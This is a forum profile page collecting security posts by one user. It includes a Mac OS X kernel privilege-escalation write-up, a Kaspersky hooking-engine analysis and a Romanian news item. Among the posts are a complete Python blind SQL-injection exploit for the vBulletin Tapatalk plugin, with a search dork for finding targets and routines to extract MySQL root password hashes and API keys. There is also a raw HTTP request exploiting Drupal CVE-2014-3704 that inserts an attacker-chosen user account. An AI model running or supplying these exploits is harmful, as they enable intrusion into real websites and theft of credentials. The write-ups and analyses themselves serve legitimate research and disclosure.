Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=3]Mac OS X local privilege escalation (IOBluetoothFamily)[/h] (This post is a joint work with @joystick, see also his blog here) Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods, including ASLR, NX, various heap protections, stack canaries, and sandboxed execution. As a natural consequence, instead of extricating themselves with such a plethora of defensive methods, attackers prefer to take the “easy” way and started to move at the kernel-level, where sophisticated protection techniques are still not very common (indeed, things like as KASLR and SMEP are implemented only in the latest versions of the most popular OSes). This trend is also confirmed by the rising number of kernel-level vulnerabilities reported in the last few months in Windows, Linux, and OS X. Following this trend, we recently looked at few OS X drivers (“KEXT”s) and found a integer signedness bug affecting service IOBluetoothHCIController (implemented by the IOBluetoothFamily KEXT). This vulnerability can be exploited by a local attacker to gain root privileges. The issue is present on the latest versions of OS X Mavericks (tested on 10.9.4 and 10.9.5), but has been “silently” patched by Apple in OS X Yosemite. [h=3]Vulnerability overview[/h] In a nutshell, the bug lies in the IOBluetoothHCIUserClient::SimpleDispatchWL() function. The function eventually takes a user-supplied 32-bit signed integer value and uses it to index a global array of structures containing a function pointer. The chosen function pointer is finally called. As the reader can easily imagine, SimpleDispatchWL() fails at properly sanitizing the user-supplied index, thus bad things may happen if a malicious user is able to control the chosen function pointer. More in detail, the vulnerable part of the function is summarized in the pseudocode below. At line 14, the user-supplied 32-bit integer is casted to a 64-bit value. Then, the "if" statement at line 16 returns an error if the casted (signed) value is greater than the number of methods available in the global _sRoutines array; obviously, due to the signed comparison, any negative value for the method_index variable will pass this test. At line 20 method_index is used to access the _sRoutines array, and the retrieved callback is finally called at line 23. [TABLE] [TR] [TD] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [/TD] [TD]typedef struct { void (*function_pointer)(); uint64 num_arguments; } BluetoothMethod; BluetoothMethod _sRoutines[] = { ... }; uint64 _sRoutineCount = sizeof(_sRoutines)/sizeof(BluetoothMethod); IOReturn IOBluetoothHCIUserClient::SimpleDispatchWL(IOBluetoothHCIDispatchParams *params) { // Here "user_param" is a signed 32-bit integer parameter int64 method_index = (int64) user_param; if (method_index >= _sRoutineCount) { return kIOReturnUnsupported; } BluetoothMethod method = _sRoutines[method_index]; ... if (method.num_arguments < 8) { method.function_pointer(...); } ... } [/TD] [/TR] [/TABLE] [h=3]Exploitation details[/h] Exploitation of this vulnerability is just a matter of supplying the proper negative integer value in order to make IOBluetoothFamily index the global _sRoutines structure out of its bounds, and to fetch an attacker-controlled structure. The supplied value must be negative to index outside the _sRoutines structure while still satisfying the check at line 16. As a foreword, consider that for our "proof-of-concept" we disabled both SMEP/SMAP and KASLR, so some additional voodoo tricks are required to get a fully weaponized exploit. Thus, our approach was actually very simple: we computed a value for the user-supplied parameter that allowed us to index a BluetoothMethod structure such that BluetoothMethod.function_ptr is a valid user-space address (where we placed our shellcode), while BluetoothMethod.num_arguments is an integer value less than 8 (to satisfy the check performed by SimpleDispatchWL() at line 22). As shown in the C code fragment above, the user-supplied 32-bit value (user_param) is first casted to a 64-bit signed value, and then used as an index in _sRoutines. Each entry of the global _sRoutines array is 16-byte wide (two 8-byte values). These operations are implemented by the following assembly code: [TABLE] [TR] [TD] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD]; r12+70h points to the user-supplied index value mov ecx, [r12+70h] mov r13d, kIOReturnUnsupported lea rdx, _sRoutineCount cmp ecx, [rdx] jge fail ; Go on and fetch _sRoutine[method_index] ... movsxd rax, ecx ; Sign extension to 64-bit value shl rax, 4 ; method_index *= sizeof(BluetoothMethod) lea rdx, _sRoutines mov esi, [rdx+rax+8] ; esi = _sRoutines[method_index].num_arguments cmp esi, 7 ; Check method.num_arguments < 8 ja loc_289BA ... [/TD] [/TR] [/TABLE] At a higher-level, the address of the BluetoothMethod structure fetched when processing an index value "user_param" is computed by the following formula: struct_addr = (ext(user_param & 0xffffffff) * 16) + _sRoutine Where ext() is the sign-extension operation (implemented by the movsxd instruction in the assembly code snipped above). By solving this formula for user_param and searching inside the kernel address space, we found several candidate addresses that matched our criteria (i.e., a valid user-space pointer followed by an integer value < 8). The rest of the exploit is just a matter of mmap()'ing the shellcode at the proper user-space address, connecting to the IOBluetoothHCIController service and invoking the vulnerable method. The source code for a (very rough) proof-of-concept implementation of the aforementioned exploit is available here, while the following figure shows the exploit "in action". [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Execution of our "proof-of-concept" exploit[/TD] [/TR] [/TABLE] [h=3]Patching[/h] We verified the security issue both on OS X Mavericks 10.9.4 and 10.9.5 (MD5 hash values for the IOBluetoothFamily KEXT bundle on these two OS versions are 2a55b7dac51e3b546455113505b25e75 and b7411f9d80bfeab47f3eaff3c36e128f, respectively). After the release of OS X Yosemite (10.10), we noticed the vulnerability has been silently patched by Apple, with no mention about it in the security change log. A side-by-side comparison between versions 10.9.x and 10.10 of IOBluetoothFamily confirms Apple has patched the device driver by rejecting negative values for the user-supplied index. In the figure below, the user-supplied index value is compared against _sRoutineCount (orange basic block). Yosemite adds an additional check to ensure the (signed) index value is non-negative (green basic block, on the right). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Comparison of the vulnerable OS X driver (Mavericks, on the left) and patched version (Yosemite, on the right)[/TD] [/TR] [/TABLE] [h=3]Conclusions[/h] We contacted Apple on October 20th, 2014, asking for their intention to back-port the security fix to OS X Mavericks. Unfortunately, we got no reply, so we decided to publicly disclose the details of this vulnerability: Yosemite has now been released since a while and is available for free for Apple customers; thus, we don’t think the public disclosure of this bug could endanger end-users. Sursa: Roberto Paleari's blog: Mac OS X local privilege escalation (IOBluetoothFamily)
      • 1
      • Downvote
  2. Nytro
    Kaspersky Hooking Engine Analysis October 27, 2014 By Andrea Sindoni Leave a Comment In this article we will talk about a few hooking techniques used by antivirus software. For the purpose of this analysis the antivirus chosen will be Kaspersky (Antivirus in prova: scarica le versioni trial | Kaspersky Lab IT PURE 3.0 Total Security), we will deal with various hooking techniques used both at user and kernel mode. The reference operating system will be Windows 7 Professional 32-bit. The image below shows a summary of the techniques we will analyze in this article. In order we will deal with: User-space Processes Inline hooking IAT and EAT Virtual Address Descriptor Hidden registry entry IDT SSDT MINI-FILTER IRP TDI HOOKING CALLBACKS Conclusion User-space Processes We start with a brief introduction by looking at the processes of kaspersky in user-space. The main userspace process is “avp.exe” which is instantiated twice: one instance runs under the privileges of NT AUTHORITY\SYSTEM the other is used for the user interface (avp.exe user). The other process: ProtectedObjectsSrv.exe acts as encryption service. We will focus on the last one: it runs as a background Windows service called “CSObjectsSrv” (CryptoStorage control service). InfoWatch CryptoStorage is intended for centralized protection of confidential data using cryptographic methods during data storage and processing. The product is based on the integrative approach to data protection. The functional capabilities include file and folder encryption using resilient encryption algorithms, an option to create special data storage objects – the container files, logical disks and flash drives and differentiation of access rights to the protected objects. InfoWatch CryptoStorage protects against unauthorised access to the RAM content dumped to the hard disk in case of hibernation, crash dumps or data coming from temporary files and swap files. More information about this topic can be found at InfoWatch - information security software products and solutions Let’s now look at all the hooking methods starting from the userland. Inline hooking To find API hooks in User-mode, we can use use the apihooks plugin of Volatility The processes involved in the inline hooking are: svchost.exe avp.exe[pid1] NT Authority\SYSTEM avp.exe[pid2] avp.exe one is for the protection service (avp.exe system), the other one, as already said, is for the user interface (avp.exe user). The service requires full system access, that’s why it runs as System. Let’s examine svchost.exe, this process is subject to inline hooking, in fact, at address 0x7453b5dd we can find a jump that leads to wfapigp.dll, which resides at location 0x74586218. Using Volatility we can dump the process with pid 1560 and using IDA we can quickly disassemble the dump and double check for the presence of the hook at location 0x7453b5dd. Scrolling again the report generated by Volatility, we can see that the process avp.exe uses different modules (image below) The process avp.exe makes use of different hooking techniques??, let’s try and investigate the following module: ushata.dll In this case the hooking occurs inside ntdll.dll, the function hooked is ZwProtectVirtualMemory, which is located at 0x77015f18, checking with IDA we can confirm the presence of a jump at 0x71722066, which is the location in which the hooking module ushata.dll is loaded. In here we can see how avp.exe loads ushdata.dll using a standard LoadLibraryEx() In this context, can occur something similar to what is described in the following code, basically: [TABLE] [TR] [TD=class: code]hDLL = LoadLibraryExW(L"USHATA.DLL", null, 8); lpGetNumber = (LPGETNUMBER)GetProcAddress((HMODULE)hDLL, "InitHooks"); [/TD] [/TR] [/TABLE] Let’s see what are the methods exported by the module ushdata.dll: So the exported functions of ushdata.dll module are InitHooks, SetClientVerdict and SetShuttingDownHint. In general from the report generated by volatility, the modules and functions that are subject to inline hooking, are: C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\SYSTEM32\ntdll.dll (FUNCTIONS ntdll.dll!NtProtectVirtualMemory e ntdll.dll!ZwProtectVirtualMemory) C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] ntdll.dll!NtProtectVirtualMemory JMP 70B12066 C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\ushata.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\kernel32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\ole32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] USER32.dll!NotifyWinEvent + 6AE The undocumented used is NtProtectVirtualMemory, which will allows to set the page protection and returns the old protection (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html). IAT and EAT Continuing the analysis of the hooking in User-space, we can still make use of Volatility to detect the hooking performed on both the IAT and EAT. We will find only two functions: one for the IAT hooking and another one for EAT hooking. Referring to the image at the top (EAT Hook), we conclude that the affected module is kernel32.dll, specifically the CreateThread function, as shown in the figure below: Virtual Address Descriptor We can open a brief parenthesis on the kernel data structure that takes care of registering the use of virtual addresses in a process, it is called Process VAD (Virtual Address Descriptor). For each process the memory manager maintains a set of VADs, which contain information on the address space of the process itself. Reconstructing the VAD tree allows for the reconstruction of the process with all of its mapped files. Here’s an example: The protection field highlighted in red is extracted from the flProtect parameter passed as input to the VirtualAlloc API (VirtualAlloc function (Windows)). You can also use the windbg command !vad to display the VADs of a given process: [TABLE] [TR] [TD=class: code]kd> !process 0 1 avp.exe kd> !vad [address of VadRoot] [/TD] [/TR] [/TABLE] Hidden registry entry A hive is a database of registry values ??divided in logical groups of keys and subkeys; the values ??in the registry, in turn, have a number of supporting files containing backups of their data. These files are located mainly in the %SystemRoot% \System32\Config and are created/updated each time the user logs in. Here is a table showing the standard hive with the respective files (Registry Hives (Windows)): [TABLE] [TR] [TD]Registry hive[/TD] [TD]Supporting files[/TD] [/TR] [TR] [TD]HKEY_CURRENT_CONFIG[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_CURRENT_USER[/TD] [TD]Ntuser.dat, Ntuser.dat.log[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\SAM[/TD] [TD]Sam, Sam.log, Sam.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Security[/TD] [TD]Security, Security.log, Security.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Software[/TD] [TD]Software, Software.log, Software.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\System[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_USERS\.DEFAULT[/TD] [TD]Default, Default.log, Default.sav[/TD] [/TR] [/TABLE] Let’s look for hidden registry values related to the driver klif.sys and let’s start with the help command !reg: !reg hivelist It displays a list of all hives in the system, then we select the Hive Address of SYSTEM using the following command: !reg openkeys “Hive Address of SYSTEM” It displays all open keys in a hive: I also used the above the command: !reg cellIndex “HiveAddress of SYSTEM” “Index” It displays the virtual address for a cell in a hive, Index specifies the cell index. Using the command: !reg valuelist “HiveAddress of SYSTEM” KeyNodeAddress we can show a list of the values in the specified key node, KeyNodeAddress specifies the address of the key node. Then we show the registry key value structure !reg kvalue Address Address specifies the address of the value, finally, we can reuse the cell index with the new index of the cell and dc command (it displays double word values, 4 bytes, and ASCII characters) We can achieve the same result using Volatility, let’s briefly show how to do that using the command hivelist: And once again we come across the KLIF service: Let’s now move to the analysis of the hooking at kernel space, in particular we will deal with: IDT, SSDT and IRP hooking. IDT System calls are used to traverse the barrier that exists between user space and kernel space, for this task the IDT is used, the IDT is the table that implements the interrupt vector table, in turn used to dispatch the interrupts. The IDT is composed, internally, of a data structure of 8 bytes entries, which describes how the interrupt must be managed (x86 CPU). In the picture below you can see the relationship between IDT and the instruction “int 2e” that is normally used to initiate a system call, even though on recent CPUs the SYSENTER instruction is used a replacement. The goal of IDT hooking is to hook any function already registered for a given interrupt. Let’s see if the software in question uses these techniques, so we can analyze it with windbg and the command !idt Now let’s run the same check with volatility,using the command idt, we will see that the two results match: In the selected row we can see, from the column Value, that the address matches the one analyzed with windbg, also in the column Module we can notice the presence of ntoskrnl.exe, which shows that there are no hooks in place. SSDT The System Service Descriptor Table (SSDT) contains pointers to kernel mode functions provided by the kernel executable module (ntoskrnl.exe). There is a second SSDT called shadow SSDT table, that instead stores the native functions provided by the GUI module win32k.sys. It ‘important to make an observation: when a system call reaches ntdll.dll, EAX will contain the hexadecimal value corresponding to the index into the SSDT of the function to be called, and immediately after the command int 2E the control is transferred to KiSystemService: We’re going to check the contents of the two tables for the software in question, it is possible to analyze the memory with Volatility or WinDBG: From the figure on the left hand side we can see the memory belonging to klif.sys at address 0x8C836000. On the right hand side we have the output of the command: kd> dps KiServiceTable l11C that show the presence of SSDT hooks from the klif module. We can also investigate KeServiceDescriptorTable and KeServiceDescriptorTableShadow. The module klif.sys seems to be the one that deals with SSDT and SSDT Shadow hooking. Let’s look more closely at klif.sys, the first function we’re going to inspect is “PsSetLoadImageNotifyRoutine” that registers a driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory). In the image below we see a series of two calls, the first one calls ZwQuerySystemInformation and then the second one invokes KeServiceDescriptorTable, which is the classical sequence used to install an SSDT hook. SSDT hooking is not performed on 64-bits systems because the Kernel Patch Protection (KPP), also known as Patchguard, protects this structure. It is anyway possible to use a mini-filter driver as a workaround. MINI-FILTER And indeed that’s what we have, a minifilter driver: A mini-filter driver must specify an altitude value from an altitude range that represents a load order group. A minifilter driver’s altitude ensures that the instance of the minifilter driver is always loaded at the appropriate location related to other minifilter driver instances, and it determines the order in which the filter manager calls the minifilter driver to handle I/O. Altitudes are allocated and managed by Microsoft itself. The following figure shows a simplified I/O stack with the filter manager and three minifilter drivers. I n our case we have [TABLE] [TR] [TD]Load order group[/TD] [TD]Altitude range[/TD] [TD]Description[/TD] [/TR] [TR] [TD]FSFilter Anti-Virus[/TD] [TD]320000-329999[/TD] [TD]This group includes filter drivers that detect and disinfect viruses during file I/O.[/TD] [/TR] [/TABLE] More information at http://msdn.microsoft.com/en-us/library/windows/hardware/ff549689%28v=vs.85%29.aspx IRP An IRP is an object used to communicate between all the different layers of a driver stack (Driver stacks (Windows Drivers)). For each driver, there are some major functions that receive IRPs to process. These major functions are kept inside a table of pointers. This driver contains the following functions: Driver Entry AddDevice Dispatch routine Unload() The Driver Object structure is presented as follows By default the I/O manager does point the DriverInit at the DriverEntry(). The array MajorFunction is essentially a table, each driver populates this table with function pointers, called Dispatch routine. The main data structures used by the kernel driver majors are the IRPs. Some of the most used are: IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, IRP_MJ_DEVICE_CONTROL. We can sniff the traffic IRP to the driver klif using Irp Tracker: From the red boxes we can see the two processes: avp.exe and svchost.exe calling the NtFsControlFile API (which sends a control code directly to the driver klif) TDI HOOKING The kernel module responsible for TDI HOOKING is kltdi.sys, we can look for it inside the structure LDR_DATA_TABLE_ENTRY, pointed by PsLoadedModuleList. By running the modules command in Volatility we will get: kltdi.sys 0x8cb7a000 0x9000 \SystemRoot\system32\DRIVERS\kltdi.sys At this point we can check to see if there is something unusual for the driver “tdx“: As we can see this is a list of devices that belongs to \Driver\tdx and in each device the module kltdi.sys is present, loaded at the address 0x8cb57000. Using Windbg we can check what happens at the location where tdx.sys is loaded: tdx.sys 0x8cb57000 0x17000 \SystemRoot\system32\DRIVERS\tdx.sys We only see the location of the major Function IRP_MJ_CREATE: DriverName: tdx DriverStart: 0x8cb57000 DriverSize: 0x17000 DriverStartIo: 0x0 0 IRP_MJ_CREATE 0x8cb62faa tdx.sys Let’s set a breakpoint at the address 0x8cb62faa, this is the location where the major function IRP_MJ_CREATE of the module tdx.sys. After then we can start a ping and the debugger will immediately break at the address we are expecting, thus confirming the existence of a TDI hook. We can see in the call stack the presence of the module kltdi.sys, let’s focus on the function kltdi+0x4803: The IoCallDriver routine sends an IRP to the driver associated with a specified device object, it accepts two input parameters DEVICE_OBJECT*an IRP* [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]NTSTATUS IoCallDriver( _In_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp ); [/TD] [/TR] [/TABLE] Quoting the Microsoft’s documentation: An IRP passed in a call to IoCallDriver becomes inaccessible to the higher-level driver, unless the higher-level driver has called IoSetCompletionRoutine to set up an IoCompletion routine for the IRP. If it has, the IRP input to the IoCompletion routine has its I/O status block set by the lower drivers, and all lower-level drivers’ I/O stack locations are filled with zeros. CALLBACKS Now let’s take a look at the kernel callbacks, once again with Volatility: Thread creation (PsSetCreateThreadNotifyRoutine): klif.sys kl1.sys Shutdown callbacks (IoRegisterShutdownNotification): kl1.sys KeRegisterBugCheckReasonCallback kl1.sys There are several addresses for the callbacks, but we want to point out the presence of kernel module kl1.sys, so let’s dig deeper: kl1.sys is is a boot start driver, in the image below you can see the presence (in the DriverEntry routine) of the API IoRegisterBootDriverReinitialization. IoRegisterBootDriverReinitialization() function registers a callback routine that will be called whenever all boot drivers have been loaded. This routine is typically used in filters that attach on non-Plug-and-Play devices, and thus, they cannot rely on AddDevice() function calling to be notified that a new device was created (check this example for more details Let’s Start Again « DriverEntry.com.br). Now let’s also look at the Driver Dispatch Routines: As you can see, all Driver Dispatch Routines point to the same address, kl1+0x32f0 Conclusion The article was written for educational purposes, the analysis is not detailed and many things have been analysed very quickly, also there is still research to be done on the network part. A big thanks goes to Quequero. Reference http://www.reconstructer.org/papers/Hunting%20rootkits%20with%20Windbg.pdf Malware Analysts Cookbook and DVD: Tools and Techniques for Fighting Malicious Code Sursa: https://quequero.org/2014/10/kaspersky-hooking-engine-analysis/
  3. Nytro
    Cei care veniti sa nu uitati tricourile cu "Fan Nytro"!
  4. Nytro
    Hacking Oracle from the Web This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database. Most of the techniques available over the Internet are based on exploitation when attacker has interactive access to the Oracle database, i.e. he can connect to the database via a SQL client. While some of these techniques can be directly applied when exploiting SQL injection in web applications, this is not always true. Unlike MS-*?SQL, Oracle neither supports nested queries, nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-*?end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper. Download: http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf
  5. Nytro
    Daca te interesai, aflai ca le are de dinainte de a intra in politica. Si daca vedeai poze iti dadeai seama ca nu sunt "vile". Problema pe care o vad eu la el e urmatoarea: si el ofera "plase cu de toate" babutelor pe la tara ca sa il voteze. Deci MUIE.
  6. Nytro
    Votati.
  7. Nytro
    [h=1]O nou? meserie în România: specialist în securitate cibernetic?[/h]de Liviu Iancu - Mediafax O nou? meserie va ap?rea în România, de specialist în domeniul securit??ii cibernetice, iar în prezent se lucreaz? la fi?a postului, urmând s? fie introdus? în codul ocupa?ional ?i s? i se stabileasc? standarde salariale, a declarat miercuri Sorin Encu?escu, consilier de stat al primului-ministru. "Preocuparea noastr? în acest moment este aceea ca institu?iile s? aib? oameni specializa?i care s? poat? s? lucreze cât se poate de calificat în acest domeniu. De aceea, odat? cu dezvoltarea sistemului de atribu?ii institu?ionale, în momentul de fa?? se lucreaz? inclusiv la fi?a posturilor pe care urmeaz? s? fie încadrate, în a?a fel încât s? putem fi în m?sur? s? cre?m în România ?i s? punem în codul ocupa?ional func?ia de specialist în domeniul securit??ii cibernetice. Aceast? nou? meserie trebuie recunoscut? ?i trebuie introdus? în codul ocupa?ional român, de unde inclusiv putem stabili standarde de salarizare", a spus Encu?escu la un seminar organizat de grupul UTI. El a ar?tat c? în strategia industriei na?ionale de securitate a fost introdus? o nou? component?, cea a dezvolt?rii ?i sus?inerii operatorilor economici publici ?i cei de stat, care î?i desf??oar? activitatea în domeniul securit??ii cibernetice. "Practic, în acest moment, exist? în con?inutul strategiei, o component? care se refer? la încurajarea întreprinderilor mici ?i mijlocii ?i a start-up-urilor în domeniul securit??ii cibernetice. Sprijinim ?i încuraj?m crearea de astfel de companii", a ad?ugat Encu?escu. Consilierul a men?ionat c? statul inten?ioneaz? s? acorde facilit??i fiscale companiilor care investesc în securitatea cibernetic?. Teodor Cimpoe?u, director la compania de securitate cibernetic? certSIGN din cadrul UTI, a declarat c? în România atacurile cibernetice nu sunt f?cute doar de români, ci ?i de c?tre str?ini. "Este o amenin?are, pe de o parte, pentru utilizatorul individual, care st? pe internet, de la simplul fapt c? îi sunt furate datele de login ?i conturile de re?ele sociale, pân? la a-i fi furate datele bancare sau chiar banii din cont. La companii este mai grav, pentru c? le pot fi afectate structurile informatice cu care î?i desf??oar? activitatea", a mai spus Cimpoe?u. Sursa: O nou? meserie în România: specialist în securitate cibernetic? - Mediafax
  8. Nytro
    [h=1]vBulletin Tapatalk - Blind SQL Injection[/h] #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, urllib import xmlrpclib,re, urllib2,string,itertools,time from distutils.version import LooseVersion class Exploit(object): def __init__(self, target, debug=0 ): self.stopwatch_start=time.time() self.target = target self.path = target self.debug=debug if not self.target.endswith("mobiquo.php"): self.path = self.detect_tapatalk() if not self.path: raise Exception("Could not detect tapatalk or version not supported!") self.rpc_connect() self.attack_func = self.attack_2 def detect_tapatalk(self): # request page, check for tapatalk banner handlers = [ urllib2.HTTPHandler(debuglevel=self.debug), urllib2.HTTPSHandler(debuglevel=self.debug), ] ua = urllib2.build_opener(*handlers) ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')] data = ua.open(self.target).read() if self.debug: print data if not "tapatalkDetect()" in data: print "[xx] could not detect tapatalk. bye..." return None # extract tapatalk version print "[ i] Taptalk detected ... ", path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL)) path+="mobiquo.php" print "'%s' ... "%path, data = urllib.urlopen(path).read() version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data)) if LooseVersion(version) <= LooseVersion("5.2.1"): print "v.%s - OK"%version return path print "v.%s - not vulnerable"%version return None def rpc_connect(self): self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug) def attack_1(self, sqli, sleep=2): ''' SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribethreadid = <INJECTION> AND subscribethreadid.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribethread.userid) WHERE subscribethreadid = %s AND subscribethread.userid = 0"""%query return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_" def attack_2(self, sqli, sleep=2): ''' SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = <INJECTION> AND subscribeforum.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_" def attack_blind(self,sqli,sleep=2): return self.attack_func(sqli,sleep=sleep) #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli) def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True): ''' provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS> ''' hit = False # PHASE 1 - guess entry length print "[ ] trying to guess length ..." for guess_length in xrange(maxlength+1): q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() print ".", if duration >= sleep-sleep/8: # HIT! - got length! => guess_length hit = True print "" break if not hit: print "[ !!] unable to guess password length, check query!" return None print "[ *] LENGTH = %s"%guess_length # PHASE 2 - guess password up to length print "[ ] trying to guess value ..." hits = 0 result = "" for pos in xrange(guess_length): # for each char pos in up to guessed length for attempt in self.bruteforce(charset, 1): # probe all chars in charset #attempt = re.escape(attempt) if attempt == "%%": attempt= "\%" #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt)) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() #print result,attempt," ",duration print ".", if duration >= sleep-sleep/8: if case: # case insensitive hit - recheck case: this is drastically reducing queries needed. q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower())) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() if duration >= sleep-sleep/8: attempt = attempt.lower() else: attempt = attempt.upper() # case sensitive - end # HIT! - got length! => guess_length hits += 1 print "" print "[ +] HIT! - %s[%s].."%(result,attempt) result += attempt break if not hits==guess_length: print "[ !!] unable to guess password length, check query!" return None print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result)) return result def bruteforce(self, charset, maxlength): return (''.join(candidate) for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i) for i in range(1, maxlength + 1))) def stopwatch(self): stop = time.time() diff = stop - self.stopwatch_start self.stopwatch_start=stop return diff if __name__=="__main__": #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start DEBUG = False TARGET = "http://TARGET/vbb4/forum.php" x = Exploit(TARGET,debug=DEBUG) print "[ ] TAPATALK for vBulletin 4.x - SQLi" print "[--] Target: %s"%TARGET if DEBUG: print "[--] DEBUG-Mode!" print "[ +] Attack - sqli" query = u"-1 UNION SELECT 1%s"%unichr(0) if DEBUG: print u""" SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query print "[ *] guess mysql user/pass" print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", column="password", charset="*"+string.hexdigits, maxlength=45) # usually 40 chars + 1 print "[ *] guess apikey" print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>", column='value', charset=string.ascii_letters+string.digits, maxlength=14, ) print "-- done --" Sursa: vBulletin Tapatalk - Blind SQL Injection
  9. Nytro
    O sa ma bag si eu daca se mai ofera 2 persoane.
  10. Nytro
    FindWindow, FindWindowEx, GetWindowRect. Sunt multe functii de Windows pe care le poti folosi: Window Functions (Windows) Nu stiu insa ce iti ofera AutoIT-ul.
  11. Nytro
    [h=1]Drupal CVE-2014-3704 insert new user[/h] POST /drupal/?q=node&destination=node HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 192.168.88.88 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko Content-Type: application/x-www-form-urlencoded Content-Length: 258 name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in
  12. Nytro

    Categorie Donatii

    Nytro replied to ZeroDoi's topic in Sugestii

    Puteti folosi categoria "Free stuff" daca doriti sa oferiti ceva. Oferiti cui doriti, pe ce criterii doriti. Bafta!
  13. Nytro
    Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4182969-security-patch-release-for-vbulletin-connect-5-0-0-5-1-4
  14. Nytro
